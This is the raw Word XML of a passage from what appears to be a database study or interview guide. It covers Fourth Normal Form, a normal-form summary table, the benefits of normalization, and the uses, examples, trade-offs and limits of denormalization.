          <w:p w14:paraId="490CC1D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975DEE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515A56AB" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E04A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B89D2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bl>
    <w:p w14:paraId="11BBCB5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0D785">
          <v:rect id="_x0000_i3211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C75A8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5. Fourth Normal Form (4NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFBC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if it satisfies the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548727E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60135D2D"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multi-valued dependencies, meaning that a record does not contain two or more independent, multivalued facts about an entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA7C6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multi-valued dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2B12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4NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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804"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0A580D7C" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="114371E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63745B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01D959D6"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71AC14BF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F09FE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D6240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6D4E58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55B65D77" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71A4DC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CBEF4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24C93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7F4A039E" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="502C8F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588DB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F2FF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5579BD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the Hobby is independent of Course ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5E66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after splitting the table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5289F25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759F4A1C" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="112418A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30D1A47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48B0E16" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AEB0F0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6AD61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742413B9" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45A842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31D3F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03C7792F" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2715920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8FC6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1680A89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Hobby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04"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="22FC6D5D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60D1584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5A3449B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48BA65EF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48FC3CA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FAF07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0DAA4191" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E551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4584AB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31A0AF8D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57A21B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082C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7C7B87C4"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8DE95">
          <v:rect id="_x0000_i3212" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1463D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8683"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="05FA5AD7" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B4764C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Normal Form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF31F0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18E9606B" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="707B90E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F7364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repeating groups, ensures atomicity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6F9668F5" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C24A51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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34DF24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moves partial dependencies (depends on whole key).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="324F8366" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="784579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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C4230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transitive dependencies (non-key attribute dependent on another non-key attribute).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="034F5E52" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F70B8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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126D39C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nsures that every determinant is a superkey.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="51E4656A" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16E212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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79DA971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multi-valued dependencies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="421375B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Benefits of Normalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98B28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s Data Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Saves storage space by eliminating duplicate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2005708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s Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures consistency and accuracy of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9FD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nhances Query Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces unnecessary data retrieval during queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79307C8E" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00CE4B95" w:rsidRDefault="002C0B92" w:rsidP="00393B05">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Normalization improves the design of the database, reduces the chances of anomalies, and makes the database more scalable and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65A5B7" w14:textId="6A58877E"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3213" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF9682" w14:textId="67F4FCC9" w:rsidR="00296A28" w:rsidRPr="00CE4B95" w:rsidRDefault="002C0B92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="762" w:name="_Toc197867976"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidR="008916D9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Denormalization</w:t>
      </w:r>
      <w:r w:rsidR="00296A28" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="762"/>
    </w:p>
    <w:p w14:paraId="2C84A185" w14:textId="3DB5E937" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898"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While normalization aims to reduce data redundancy and maintain data integrity by organizing data into multiple related tables, denormalization is used to optimize performance, particularly in scenario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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>need to be faster or more efficient. Denormalization might involve combining tables, adding computed fields, or including repeated data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88B9C6"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Denormalization is Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4BCA0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erformance Improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Denormalization can improve the speed of data retrieval because fewer joins are needed between tables, making the data retrieval process faster. It is particularly helpful in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applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35934EDB"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ify Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In highly normalized databases, queries often require multiple joins, which can be computationally expensive. Denormalization reduces the number of joins, improving query performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C0B2D0"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Complexity in Data Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, denormalized data models can be simpler for certain applications, reducing the complexity of accessing and combining related data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C98ABCF"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Use Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803DA4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n Performance is Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In system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such as generating reports, querying frequently accessed data) are more frequent than </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like online transaction processing), denormalization can optimize performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA74F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orting and Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In data warehousing, OLAP (Online Analytical Processing) systems, and analytics systems, denormalization is common because these systems require fast query responses and are optimized for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operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C716E2"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che Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Denormalization can be used when caching or materialized views are employed to precompute and store results to avoid recalculating values on every request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5911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istributed Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In distributed systems or NoSQL databases (like MongoDB, Cassandra), denormalization is often used to optimize performance, as these systems may prioritize speed over consistency and integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B6FD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s of Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DED1E5"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Tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of having two separate tables for Orders and OrderDetails, you could merge them into one table to avoid needing a join.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026EDA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1076C5C8"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OrderID, CustomerID, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E350A"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Details Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains OrderID, ProductID, Quantity, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595A0FD"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384DFA61"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all fields like OrderID, CustomerID, ProductID, Quantity, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B275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dding Computed Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A TotalAmount field can be added to an order table to store the computed sum of product prices and quantities, instead of calculating the total each time a query is run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F72099A"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64E74B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B8FE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Details table: OrderID, ProductID, Price, Quantity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBBB8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79B4F4A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 (where TotalAmount is precomputed and stored)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A1AE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oring Foreign Key Data Directly</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, you might store the actual foreign key values (like names or descriptions) alongside the foreign keys for easy reference, instead of joining related tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A881745"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 Store only ProductID in the Orders table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F180BF"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 Store both ProductID and ProductName in the Orders table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4C83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s of Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE20C51"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aster Read Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By reducing joins, you can speed up queries and make data retrieval more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FF88E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er Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can reduce the complexity of SQL queries, making them easier to write and execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34853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d Computational Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces the need for real-time computations (like joining and aggregating data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6C99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s of Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0C4C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Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the same data may be stored in multiple places, the size of the database increases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C19EA1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Anomalies</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Redundant data increases the risk of inconsistencies when data changes. For example, if you update an address in one place but forget to update it elsewhere, the data will be inconsistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193698D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creased Storage Costs</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Storing redundant data increases the overall storage requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91A507"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plex Writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Write operations (insert, update, delete) can become more complex because changes must be made in multiple places.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474D73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Consistency Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Keeping data in sync across all redundant copies can lead to consistency problems, especially in systems where transactions or ACID properties are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171DC8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Avoid Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68262F0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rite-heavy Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If the application has a large number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations, denormalization can become a bottleneck since every update needs to be reflected across multiple tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7601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l-time Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If consistency is crucial and the system requires real-time updates, denormalization can cause performance problems as the redundant data may not always stay up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EE4F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mall Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the database is small, the benefits of denormalization may be marginal, and normalization will likely be sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5182CCEB"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clusion:</w:t>
      </w:r>
    </w:p>
